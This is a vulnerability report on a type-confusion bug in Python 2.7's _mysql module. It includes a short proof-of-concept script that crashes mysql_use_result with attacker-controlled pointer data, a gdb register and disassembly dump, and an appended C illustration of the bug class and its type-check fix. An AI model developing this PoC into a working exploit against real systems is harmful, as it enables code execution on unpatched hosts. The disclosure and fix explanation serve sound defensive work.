Hello.
I found a vulnerability in the _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
# second argument of _mysql.result() is the "use" flag; non-zero selects mysql_use_result()
RDX=0x66666666
# a plain string is passed where a connection object is expected
payload="A"*2048
_mysql.result(payload,RDX)
It's an exploitable bug; I'm working on an exploit.
(gdb) run mysql.py
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff7e91b90 140737352637328
rcx 0x0 0
rdx 0x66666666 1717986918
rsi 0x7ffff7eb1ec0 140737352769216
rdi 0x5555557f9890 93824995006608
rbp 0x7fffffffe120 0x7fffffffe120
rsp 0x7fffffffe0a8 0x7fffffffe0a8
r8 0x7fffffffdd00 140737488346368
r9 0x7fffffffdd80 140737488346496
r10 0x5555557824f0 93824994518256
r11 0x2 2
r12 0x5555557560a0 93824994336928
r13 0x0 0
r14 0x7ffff7e939c7 140737352645063
r15 0x7ffff7e91b90 140737352637328
rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
0x00007ffff38e7f30 <+0>: push %rbp
0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax
0x00007ffff38e7f38 <+8>: mov %rsp,%rbp
0x00007ffff38e7f3b <+11>: pop %rbp
=> 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax
0x00007ffff38e7f40 <+16>: jmpq *%rax
End of assembler dump.
(gdb)
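Added illustration, not code from the report above or from the _mysql module: the dump shows "mov 0x4d0(%rdi),%rax" loading 0x4141414141414141 and the fault on the following "mov 0x18(%rax),%rax", which is consistent with the bytes of the 2048-byte string being read as if they were a connection structure, so the function pointer fetched next comes from caller-controlled data. The toy below in plain C models that class of bug with a constructed object layout (a type tag followed by either string bytes or a method-table pointer; names, offsets and the stub method table are assumptions for the example, not libmysqlclient's or CPython's). It contrasts an unchecked cast with the argument-type check that CPython extensions get from the "O!" format of PyArg_ParseTuple or an explicit PyObject_TypeCheck, which turns the same call into a TypeError instead of a crash.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy object model for this example: not CPython's object layout
 * and not _mysql's. Each object starts with a type tag, as every CPython
 * object starts with ob_type. */
enum { TYPE_STRING = 1, TYPE_CONNECTION = 2 };

typedef struct { uint32_t type; } object;

typedef struct {
    object base;
    char data[64];          /* caller-controlled bytes sit right after the tag */
} string_object;

/* Stand-in for a method table reached through the connection handle. */
typedef struct { int (*use_result)(const void *conn); } methods;

typedef struct {
    object base;
    const methods *vtable;  /* pointer-sized field after the tag */
} connection_object;

#define RESULT_OK         0
#define RESULT_TYPE_ERROR (-1)

static int stub_use_result(const void *conn) { (void)conn; return RESULT_OK; }
static const methods connection_methods = { stub_use_result };

/* Unchecked path: models an extension that takes its argument with the plain
 * "O" format and casts it to the struct it expects without looking at the
 * tag. To stay well-defined here it returns the 8 bytes that would be used as
 * the method-table pointer instead of dereferencing them. */
uint64_t unchecked_method_table(const object *arg)
{
    uint64_t raw;
    memcpy(&raw, (const unsigned char *)arg + offsetof(connection_object, vtable), sizeof raw);
    return raw;
}

/* Checked path: models the "O!" format of PyArg_ParseTuple (or an explicit
 * PyObject_TypeCheck) that rejects the wrong type before the cast. */
int checked_result(const object *arg)
{
    if (arg->type != TYPE_CONNECTION)
        return RESULT_TYPE_ERROR;    /* a TypeError instead of a crash */
    const connection_object *conn = (const connection_object *)arg;
    return conn->vtable->use_result(conn);
}

/* Builds a string object filled with one byte, mirroring "A"*2048 above. */
static string_object make_string(char fill)
{
    string_object s;
    s.base.type = TYPE_STRING;
    memset(s.data, fill, sizeof s.data);
    return s;
}

static connection_object make_connection(void)
{
    connection_object c;
    c.base.type = TYPE_CONNECTION;
    c.vtable = &connection_methods;
    return c;
}

/* Named entry points so the three outcomes can be checked individually. */
uint64_t demo_unchecked_on_string(void)
{
    string_object s = make_string('A');
    return unchecked_method_table(&s.base);       /* 0x4141414141414141 */
}

int demo_checked_on_string(void)
{
    string_object s = make_string('A');
    return checked_result(&s.base);               /* RESULT_TYPE_ERROR */
}

int demo_checked_on_connection(void)
{
    connection_object c = make_connection();
    return checked_result(&c.base);               /* RESULT_OK */
}

int main(void)
{
    printf("unchecked path would dereference 0x%llx\n",
           (unsigned long long)demo_unchecked_on_string());
    printf("checked path: string -> %d, connection -> %d\n",
           demo_checked_on_string(), demo_checked_on_connection());
    return 0;
}
```

The unchecked function deliberately stops one step short of the real module: it reports the value it would have used as a pointer rather than following it, which is exactly the 0x4141414141414141 seen in rax in the session above. The fix for this bug class is the one-line tag check in checked_result; in a CPython extension that is the difference between parsing the argument with "O" and with "O!" plus the expected type object.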